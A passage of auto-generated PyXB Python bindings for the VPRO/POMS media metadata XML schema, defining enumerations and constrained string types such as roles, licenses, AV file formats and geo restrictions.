_module_typeBindings.platformTypeEnum = platformTypeEnum
# Atomic simple type: {urn:vpro:media:2009}textualTypeEnum
class textualTypeEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'textualTypeEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 393, 2)
_Documentation = None
textualTypeEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=textualTypeEnum, enum_prefix=None)
textualTypeEnum.MAIN = textualTypeEnum._CF_enumeration.addEnumeration(unicode_value='MAIN', tag='MAIN')
textualTypeEnum.LONG = textualTypeEnum._CF_enumeration.addEnumeration(unicode_value='LONG', tag='LONG')
textualTypeEnum.SHORT = textualTypeEnum._CF_enumeration.addEnumeration(unicode_value='SHORT', tag='SHORT')
textualTypeEnum.SUB = textualTypeEnum._CF_enumeration.addEnumeration(unicode_value='SUB', tag='SUB')
textualTypeEnum.KICKER = textualTypeEnum._CF_enumeration.addEnumeration(unicode_value='KICKER', tag='KICKER')
textualTypeEnum.ORIGINAL = textualTypeEnum._CF_enumeration.addEnumeration(unicode_value='ORIGINAL', tag='ORIGINAL')
textualTypeEnum.EPISODE = textualTypeEnum._CF_enumeration.addEnumeration(unicode_value='EPISODE', tag='EPISODE')
textualTypeEnum.WORK = textualTypeEnum._CF_enumeration.addEnumeration(unicode_value='WORK', tag='WORK')
textualTypeEnum.LEXICO = textualTypeEnum._CF_enumeration.addEnumeration(unicode_value='LEXICO', tag='LEXICO')
textualTypeEnum.ABBREVIATION = textualTypeEnum._CF_enumeration.addEnumeration(unicode_value='ABBREVIATION', tag='ABBREVIATION')
textualTypeEnum._InitializeFacetMap(textualTypeEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'textualTypeEnum', textualTypeEnum)
_module_typeBindings.textualTypeEnum = textualTypeEnum
# Atomic simple type: {urn:vpro:media:2009}intentionEnum
class intentionEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'intentionEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 408, 2)
_Documentation = None
intentionEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=intentionEnum, enum_prefix=None)
intentionEnum.INFORM = intentionEnum._CF_enumeration.addEnumeration(unicode_value='INFORM', tag='INFORM')
intentionEnum.INFORM_NEWS_AND_FACTS = intentionEnum._CF_enumeration.addEnumeration(unicode_value='INFORM_NEWS_AND_FACTS', tag='INFORM_NEWS_AND_FACTS')
intentionEnum.INFORM_INDEPTH = intentionEnum._CF_enumeration.addEnumeration(unicode_value='INFORM_INDEPTH', tag='INFORM_INDEPTH')
intentionEnum.INFORM_GENERAL = intentionEnum._CF_enumeration.addEnumeration(unicode_value='INFORM_GENERAL', tag='INFORM_GENERAL')
intentionEnum.ENTERTAINMENT = intentionEnum._CF_enumeration.addEnumeration(unicode_value='ENTERTAINMENT', tag='ENTERTAINMENT')
intentionEnum.ENTERTAINMENT_LEASURE = intentionEnum._CF_enumeration.addEnumeration(unicode_value='ENTERTAINMENT_LEASURE', tag='ENTERTAINMENT_LEASURE')
intentionEnum.ENTERTAINMENT_INFORMATIVE = intentionEnum._CF_enumeration.addEnumeration(unicode_value='ENTERTAINMENT_INFORMATIVE', tag='ENTERTAINMENT_INFORMATIVE')
intentionEnum.ACTIVATING = intentionEnum._CF_enumeration.addEnumeration(unicode_value='ACTIVATING', tag='ACTIVATING')
intentionEnum._InitializeFacetMap(intentionEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'intentionEnum', intentionEnum)
_module_typeBindings.intentionEnum = intentionEnum
# Atomic simple type: {urn:vpro:media:2009}targetGroupEnum
class targetGroupEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'targetGroupEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 421, 2)
_Documentation = None
targetGroupEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=targetGroupEnum, enum_prefix=None)
targetGroupEnum.KIDS_6 = targetGroupEnum._CF_enumeration.addEnumeration(unicode_value='KIDS_6', tag='KIDS_6')
targetGroupEnum.KIDS_12 = targetGroupEnum._CF_enumeration.addEnumeration(unicode_value='KIDS_12', tag='KIDS_12')
targetGroupEnum.YOUNG_ADULTS = targetGroupEnum._CF_enumeration.addEnumeration(unicode_value='YOUNG_ADULTS', tag='YOUNG_ADULTS')
targetGroupEnum.ADULTS = targetGroupEnum._CF_enumeration.addEnumeration(unicode_value='ADULTS', tag='ADULTS')
targetGroupEnum.ADULTS_WITH_KIDS_6 = targetGroupEnum._CF_enumeration.addEnumeration(unicode_value='ADULTS_WITH_KIDS_6', tag='ADULTS_WITH_KIDS_6')
targetGroupEnum.ADULTS_WITH_KIDS_12 = targetGroupEnum._CF_enumeration.addEnumeration(unicode_value='ADULTS_WITH_KIDS_12', tag='ADULTS_WITH_KIDS_12')
targetGroupEnum.EVERYONE = targetGroupEnum._CF_enumeration.addEnumeration(unicode_value='EVERYONE', tag='EVERYONE')
targetGroupEnum._InitializeFacetMap(targetGroupEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'targetGroupEnum', targetGroupEnum)
_module_typeBindings.targetGroupEnum = targetGroupEnum
# Atomic simple type: {urn:vpro:media:2009}avTypeEnum
class avTypeEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'avTypeEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 433, 2)
_Documentation = None
avTypeEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=avTypeEnum, enum_prefix=None)
avTypeEnum.AUDIO = avTypeEnum._CF_enumeration.addEnumeration(unicode_value='AUDIO', tag='AUDIO')
avTypeEnum.VIDEO = avTypeEnum._CF_enumeration.addEnumeration(unicode_value='VIDEO', tag='VIDEO')
avTypeEnum.MIXED = avTypeEnum._CF_enumeration.addEnumeration(unicode_value='MIXED', tag='MIXED')
avTypeEnum._InitializeFacetMap(avTypeEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'avTypeEnum', avTypeEnum)
_module_typeBindings.avTypeEnum = avTypeEnum
# Atomic simple type: {urn:vpro:media:2009}avFileFormatEnum
class avFileFormatEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'avFileFormatEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 479, 2)
_Documentation = None
avFileFormatEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=avFileFormatEnum, enum_prefix=None)
avFileFormatEnum.MP3 = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='MP3', tag='MP3')
avFileFormatEnum.RA = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='RA', tag='RA')
avFileFormatEnum.RM = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='RM', tag='RM')
avFileFormatEnum.MP4 = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='MP4', tag='MP4')
avFileFormatEnum.WVC1 = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='WVC1', tag='WVC1')
avFileFormatEnum.WM = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='WM', tag='WM')
avFileFormatEnum.RAM = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='RAM', tag='RAM')
avFileFormatEnum.WMP = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='WMP', tag='WMP')
avFileFormatEnum.HTML = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='HTML', tag='HTML')
avFileFormatEnum.M4A = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='M4A', tag='M4A')
avFileFormatEnum.M4V = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='M4V', tag='M4V')
avFileFormatEnum.DGPP = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='DGPP', tag='DGPP')
avFileFormatEnum.FLV = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='FLV', tag='FLV')
avFileFormatEnum.HASP = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='HASP', tag='HASP')
avFileFormatEnum.MPEG2 = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='MPEG2', tag='MPEG2')
avFileFormatEnum.H264 = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='H264', tag='H264')
avFileFormatEnum.UNKNOWN = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='UNKNOWN', tag='UNKNOWN')
avFileFormatEnum._InitializeFacetMap(avFileFormatEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'avFileFormatEnum', avFileFormatEnum)
_module_typeBindings.avFileFormatEnum = avFileFormatEnum
# Atomic simple type: {urn:vpro:media:2009}colorType
class colorType (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'colorType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 518, 2)
_Documentation = None
colorType._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=colorType, enum_prefix=None)
colorType.COLOR = colorType._CF_enumeration.addEnumeration(unicode_value='COLOR', tag='COLOR')
colorType.BLACK_AND_WHITE = colorType._CF_enumeration.addEnumeration(unicode_value='BLACK AND WHITE', tag='BLACK_AND_WHITE')
colorType.BLACK_AND_WHITE_AND_COLOR = colorType._CF_enumeration.addEnumeration(unicode_value='BLACK AND WHITE AND COLOR', tag='BLACK_AND_WHITE_AND_COLOR')
colorType.COLORIZED = colorType._CF_enumeration.addEnumeration(unicode_value='COLORIZED', tag='COLORIZED')
colorType._InitializeFacetMap(colorType._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'colorType', colorType)
_module_typeBindings.colorType = colorType
# Atomic simple type: {urn:vpro:media:2009}aspectRatioEnum
class aspectRatioEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'aspectRatioEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 527, 2)
_Documentation = None
aspectRatioEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=aspectRatioEnum, enum_prefix=None)
aspectRatioEnum.n43 = aspectRatioEnum._CF_enumeration.addEnumeration(unicode_value='4:3', tag='n43')
aspectRatioEnum.n169 = aspectRatioEnum._CF_enumeration.addEnumeration(unicode_value='16:9', tag='n169')
aspectRatioEnum._InitializeFacetMap(aspectRatioEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'aspectRatioEnum', aspectRatioEnum)
_module_typeBindings.aspectRatioEnum = aspectRatioEnum
# Atomic simple type: {urn:vpro:media:2009}roleType
class roleType (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'roleType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 571, 2)
_Documentation = None
roleType._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=roleType, enum_prefix=None)
roleType.DIRECTOR = roleType._CF_enumeration.addEnumeration(unicode_value='DIRECTOR', tag='DIRECTOR')
roleType.CHIEF_EDITOR = roleType._CF_enumeration.addEnumeration(unicode_value='CHIEF_EDITOR', tag='CHIEF_EDITOR')
roleType.EDITOR = roleType._CF_enumeration.addEnumeration(unicode_value='EDITOR', tag='EDITOR')
roleType.PRESENTER = roleType._CF_enumeration.addEnumeration(unicode_value='PRESENTER', tag='PRESENTER')
roleType.INTERVIEWER = roleType._CF_enumeration.addEnumeration(unicode_value='INTERVIEWER', tag='INTERVIEWER')
roleType.PRODUCER = roleType._CF_enumeration.addEnumeration(unicode_value='PRODUCER', tag='PRODUCER')
roleType.RESEARCH = roleType._CF_enumeration.addEnumeration(unicode_value='RESEARCH', tag='RESEARCH')
roleType.GUEST = roleType._CF_enumeration.addEnumeration(unicode_value='GUEST', tag='GUEST')
roleType.REPORTER = roleType._CF_enumeration.addEnumeration(unicode_value='REPORTER', tag='REPORTER')
roleType.ACTOR = roleType._CF_enumeration.addEnumeration(unicode_value='ACTOR', tag='ACTOR')
roleType.COMMENTATOR = roleType._CF_enumeration.addEnumeration(unicode_value='COMMENTATOR', tag='COMMENTATOR')
roleType.SCRIPTWRITER = roleType._CF_enumeration.addEnumeration(unicode_value='SCRIPTWRITER', tag='SCRIPTWRITER')
roleType.COMPOSER = roleType._CF_enumeration.addEnumeration(unicode_value='COMPOSER', tag='COMPOSER')
roleType.SUBJECT = roleType._CF_enumeration.addEnumeration(unicode_value='SUBJECT', tag='SUBJECT')
roleType.PARTICIPANT = roleType._CF_enumeration.addEnumeration(unicode_value='PARTICIPANT', tag='PARTICIPANT')
roleType.SIDEKICK = roleType._CF_enumeration.addEnumeration(unicode_value='SIDEKICK', tag='SIDEKICK')
roleType.NEWS_PRESENTER = roleType._CF_enumeration.addEnumeration(unicode_value='NEWS_PRESENTER', tag='NEWS_PRESENTER')
roleType.ASSISTANT_DIRECTOR = roleType._CF_enumeration.addEnumeration(unicode_value='ASSISTANT_DIRECTOR', tag='ASSISTANT_DIRECTOR')
roleType.CAMERA = roleType._CF_enumeration.addEnumeration(unicode_value='CAMERA', tag='CAMERA')
roleType.CHOREOGRAPHY = roleType._CF_enumeration.addEnumeration(unicode_value='CHOREOGRAPHY', tag='CHOREOGRAPHY')
roleType.DUBBING = roleType._CF_enumeration.addEnumeration(unicode_value='DUBBING', tag='DUBBING')
roleType.MAKEUP = roleType._CF_enumeration.addEnumeration(unicode_value='MAKEUP', tag='MAKEUP')
roleType.PRODUCTION_MANAGEMENT = roleType._CF_enumeration.addEnumeration(unicode_value='PRODUCTION_MANAGEMENT', tag='PRODUCTION_MANAGEMENT')
roleType.STAGING = roleType._CF_enumeration.addEnumeration(unicode_value='STAGING', tag='STAGING')
roleType.STUNT = roleType._CF_enumeration.addEnumeration(unicode_value='STUNT', tag='STUNT')
roleType.VISUAL_EFFECTS = roleType._CF_enumeration.addEnumeration(unicode_value='VISUAL_EFFECTS', tag='VISUAL_EFFECTS')
roleType.UNDEFINED = roleType._CF_enumeration.addEnumeration(unicode_value='UNDEFINED', tag='UNDEFINED')
roleType._InitializeFacetMap(roleType._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'roleType', roleType)
_module_typeBindings.roleType = roleType
# Atomic simple type: {urn:vpro:media:2009}geoRoleType
class geoRoleType (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'geoRoleType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 614, 2)
_Documentation = None
geoRoleType._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=geoRoleType, enum_prefix=None)
geoRoleType.RECORDED_IN = geoRoleType._CF_enumeration.addEnumeration(unicode_value='RECORDED_IN', tag='RECORDED_IN')
geoRoleType.SUBJECT = geoRoleType._CF_enumeration.addEnumeration(unicode_value='SUBJECT', tag='SUBJECT')
geoRoleType.PRODUCED_IN = geoRoleType._CF_enumeration.addEnumeration(unicode_value='PRODUCED_IN', tag='PRODUCED_IN')
geoRoleType.UNDEFINED = geoRoleType._CF_enumeration.addEnumeration(unicode_value='UNDEFINED', tag='UNDEFINED')
geoRoleType._InitializeFacetMap(geoRoleType._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'geoRoleType', geoRoleType)
_module_typeBindings.geoRoleType = geoRoleType
# Atomic simple type: {urn:vpro:media:2009}license
class license (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'license')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 661, 2)
_Documentation = None
license._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=license, enum_prefix=None)
license.COPYRIGHTED = license._CF_enumeration.addEnumeration(unicode_value='COPYRIGHTED', tag='COPYRIGHTED')
license.PUBLIC_DOMAIN = license._CF_enumeration.addEnumeration(unicode_value='PUBLIC_DOMAIN', tag='PUBLIC_DOMAIN')
license.CC_BY = license._CF_enumeration.addEnumeration(unicode_value='CC_BY', tag='CC_BY')
license.CC_BY_SA = license._CF_enumeration.addEnumeration(unicode_value='CC_BY_SA', tag='CC_BY_SA')
license.CC_BY_ND = license._CF_enumeration.addEnumeration(unicode_value='CC_BY_ND', tag='CC_BY_ND')
license.CC_BY_NC = license._CF_enumeration.addEnumeration(unicode_value='CC_BY_NC', tag='CC_BY_NC')
license.CC_BY_NC_SA = license._CF_enumeration.addEnumeration(unicode_value='CC_BY_NC_SA', tag='CC_BY_NC_SA')
license.CC_BY_NC_ND = license._CF_enumeration.addEnumeration(unicode_value='CC_BY_NC_ND', tag='CC_BY_NC_ND')
license._InitializeFacetMap(license._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'license', license)
_module_typeBindings.license = license
# Atomic simple type: {urn:vpro:media:2009}websiteType
class websiteType (pyxb.binding.datatypes.anyURI):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'websiteType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 680, 2)
_Documentation = None
websiteType._CF_minLength = pyxb.binding.facets.CF_minLength(value=pyxb.binding.datatypes.nonNegativeInteger(1))
websiteType._CF_maxLength = pyxb.binding.facets.CF_maxLength(value=pyxb.binding.datatypes.nonNegativeInteger(255))
websiteType._InitializeFacetMap(websiteType._CF_minLength,
websiteType._CF_maxLength)
Namespace.addCategoryObject('typeBinding', 'websiteType', websiteType)
_module_typeBindings.websiteType = websiteType
# Atomic simple type: [anonymous]
class STD_ANON (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 693, 10)
_Documentation = None
STD_ANON._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=STD_ANON, enum_prefix=None)
STD_ANON.ACCOUNT = STD_ANON._CF_enumeration.addEnumeration(unicode_value='ACCOUNT', tag='ACCOUNT')
STD_ANON.HASHTAG = STD_ANON._CF_enumeration.addEnumeration(unicode_value='HASHTAG', tag='HASHTAG')
STD_ANON._InitializeFacetMap(STD_ANON._CF_enumeration)
_module_typeBindings.STD_ANON = STD_ANON
# Atomic simple type: {urn:vpro:media:2009}scheduleEventTypeEnum
class scheduleEventTypeEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'scheduleEventTypeEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 774, 2)
_Documentation = None
scheduleEventTypeEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=scheduleEventTypeEnum, enum_prefix=None)
scheduleEventTypeEnum.STRAND = scheduleEventTypeEnum._CF_enumeration.addEnumeration(unicode_value='STRAND', tag='STRAND')
scheduleEventTypeEnum._InitializeFacetMap(scheduleEventTypeEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'scheduleEventTypeEnum', scheduleEventTypeEnum)
_module_typeBindings.scheduleEventTypeEnum = scheduleEventTypeEnum
# Atomic simple type: {urn:vpro:media:2009}predictionStateEnum
class predictionStateEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'predictionStateEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 780, 2)
_Documentation = None
predictionStateEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=predictionStateEnum, enum_prefix=None)
predictionStateEnum.NOT_ANNOUNCED = predictionStateEnum._CF_enumeration.addEnumeration(unicode_value='NOT_ANNOUNCED', tag='NOT_ANNOUNCED')
predictionStateEnum.ANNOUNCED = predictionStateEnum._CF_enumeration.addEnumeration(unicode_value='ANNOUNCED', tag='ANNOUNCED')
predictionStateEnum.REALIZED = predictionStateEnum._CF_enumeration.addEnumeration(unicode_value='REALIZED', tag='REALIZED')
predictionStateEnum.REVOKED = predictionStateEnum._CF_enumeration.addEnumeration(unicode_value='REVOKED', tag='REVOKED')
predictionStateEnum._InitializeFacetMap(predictionStateEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'predictionStateEnum', predictionStateEnum)
_module_typeBindings.predictionStateEnum = predictionStateEnum
# Atomic simple type: {urn:vpro:media:2009}locationTypeEnum
class locationTypeEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'locationTypeEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 823, 2)
_Documentation = None
locationTypeEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=locationTypeEnum, enum_prefix=None)
locationTypeEnum.INTERNAL = locationTypeEnum._CF_enumeration.addEnumeration(unicode_value='INTERNAL', tag='INTERNAL')
locationTypeEnum.EXTERNAL = locationTypeEnum._CF_enumeration.addEnumeration(unicode_value='EXTERNAL', tag='EXTERNAL')
locationTypeEnum.UNKNOWN = locationTypeEnum._CF_enumeration.addEnumeration(unicode_value='UNKNOWN', tag='UNKNOWN')
locationTypeEnum._InitializeFacetMap(locationTypeEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'locationTypeEnum', locationTypeEnum)
_module_typeBindings.locationTypeEnum = locationTypeEnum
# Atomic simple type: {urn:vpro:media:2009}midType
class midType (pyxb.binding.datatypes.string):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'midType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 909, 2)
_Documentation = None
midType._CF_minLength = pyxb.binding.facets.CF_minLength(value=pyxb.binding.datatypes.nonNegativeInteger(4))
midType._CF_maxLength = pyxb.binding.facets.CF_maxLength(value=pyxb.binding.datatypes.nonNegativeInteger(255))
midType._CF_pattern = pyxb.binding.facets.CF_pattern()
midType._CF_pattern.addPattern(pattern='[ \\.a-zA-Z0-9_-]+')
midType._InitializeFacetMap(midType._CF_minLength,
midType._CF_maxLength,
midType._CF_pattern)
Namespace.addCategoryObject('typeBinding', 'midType', midType)
_module_typeBindings.midType = midType
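# Usage sketch (illustrative; the identifier below is hypothetical): a POMS
# mid is a 4-255 character string matching the pattern above, e.g.
#
#   mid = midType('VPWON_1234567')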
# Atomic simple type: {urn:vpro:media:2009}organizationIdType
class organizationIdType (pyxb.binding.datatypes.string):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'organizationIdType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 917, 2)
_Documentation = None
organizationIdType._CF_pattern = pyxb.binding.facets.CF_pattern()
organizationIdType._CF_pattern.addPattern(pattern='[A-Z0-9_-]{2,}')
organizationIdType._InitializeFacetMap(organizationIdType._CF_pattern)
Namespace.addCategoryObject('typeBinding', 'organizationIdType', organizationIdType)
_module_typeBindings.organizationIdType = organizationIdType
# Atomic simple type: {urn:vpro:media:2009}relationTypeType
class relationTypeType (pyxb.binding.datatypes.string):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'relationTypeType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 923, 2)
_Documentation = None
relationTypeType._CF_pattern = pyxb.binding.facets.CF_pattern()
relationTypeType._CF_pattern.addPattern(pattern='[A-Z0-9_-]{4,}')
relationTypeType._InitializeFacetMap(relationTypeType._CF_pattern)
Namespace.addCategoryObject('typeBinding', 'relationTypeType', relationTypeType)
_module_typeBindings.relationTypeType = relationTypeType
# Atomic simple type: {urn:vpro:media:2009}baseTextType
class baseTextType (pyxb.binding.datatypes.string):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'baseTextType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 929, 2)
_Documentation = None
baseTextType._CF_minLength = pyxb.binding.facets.CF_minLength(value=pyxb.binding.datatypes.nonNegativeInteger(1))
baseTextType._CF_maxLength = pyxb.binding.facets.CF_maxLength(value=pyxb.binding.datatypes.nonNegativeInteger(255))
baseTextType._InitializeFacetMap(baseTextType._CF_minLength,
baseTextType._CF_maxLength)
Namespace.addCategoryObject('typeBinding', 'baseTextType', baseTextType)
_module_typeBindings.baseTextType = baseTextType
# Atomic simple type: {urn:vpro:media:2009}unrequiredBaseTextType
class unrequiredBaseTextType (pyxb.binding.datatypes.string):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'unrequiredBaseTextType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 936, 2)
_Documentation = None
unrequiredBaseTextType._CF_minLength = pyxb.binding.facets.CF_minLength(value=pyxb.binding.datatypes.nonNegativeInteger(0))
unrequiredBaseTextType._CF_maxLength = pyxb.binding.facets.CF_maxLength(value=pyxb.binding.datatypes.nonNegativeInteger(255))
unrequiredBaseTextType._InitializeFacetMap(unrequiredBaseTextType._CF_minLength,
unrequiredBaseTextType._CF_maxLength)
Namespace.addCategoryObject('typeBinding', 'unrequiredBaseTextType', unrequiredBaseTextType)
_module_typeBindings.unrequiredBaseTextType = unrequiredBaseTextType
# Atomic simple type: {urn:vpro:media:2009}unboundedTextType
class unboundedTextType (pyxb.binding.datatypes.string):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'unboundedTextType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 943, 2)
_Documentation = None
unboundedTextType._CF_minLength = pyxb.binding.facets.CF_minLength(value=pyxb.binding.datatypes.nonNegativeInteger(1))
unboundedTextType._InitializeFacetMap(unboundedTextType._CF_minLength)
Namespace.addCategoryObject('typeBinding', 'unboundedTextType', unboundedTextType)
_module_typeBindings.unboundedTextType = unboundedTextType
# Atomic simple type: {urn:vpro:media:2009}termType
class termType (pyxb.binding.datatypes.string):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'termType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 956, 2)
_Documentation = None
termType._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'termType', termType)
_module_typeBindings.termType = termType
# Atomic simple type: {urn:vpro:media:2009}genreIdType
class genreIdType (pyxb.binding.datatypes.string):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'genreIdType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 960, 2)
_Documentation = None
genreIdType._CF_pattern = pyxb.binding.facets.CF_pattern()
genreIdType._CF_pattern.addPattern(pattern='3(\\.[0-9]+)+')
genreIdType._InitializeFacetMap(genreIdType._CF_pattern)
Namespace.addCategoryObject('typeBinding', 'genreIdType', genreIdType)
_module_typeBindings.genreIdType = genreIdType
# Atomic simple type: {urn:vpro:media:2009}geoRestrictionEnum
class geoRestrictionEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'geoRestrictionEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1020, 2)
_Documentation = None
geoRestrictionEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=geoRestrictionEnum, enum_prefix=None)
geoRestrictionEnum.NL = geoRestrictionEnum._CF_enumeration.addEnumeration(unicode_value='NL', tag='NL')
geoRestrictionEnum.BENELUX = geoRestrictionEnum._CF_enumeration.addEnumeration(unicode_value='BENELUX', tag='BENELUX')
geoRestrictionEnum.NLBES = geoRestrictionEnum._CF_enumeration.addEnumeration(unicode_value='NLBES', tag='NLBES')
geoRestrictionEnum.NLALL = geoRestrictionEnum._CF_enumeration.addEnumeration(unicode_value='NLALL', tag='NLALL')
geoRestrictionEnum.EU = geoRestrictionEnum._CF_enumeration.addEnumeration(unicode_value='EU', tag='EU')
geoRestrictionEnum.EUROPE = geoRestrictionEnum._CF_enumeration.addEnumeration(unicode_value='EUROPE', tag='EUROPE')
geoRestrictionEnum._InitializeFacetMap(geoRestrictionEnum._CF_enumeration)
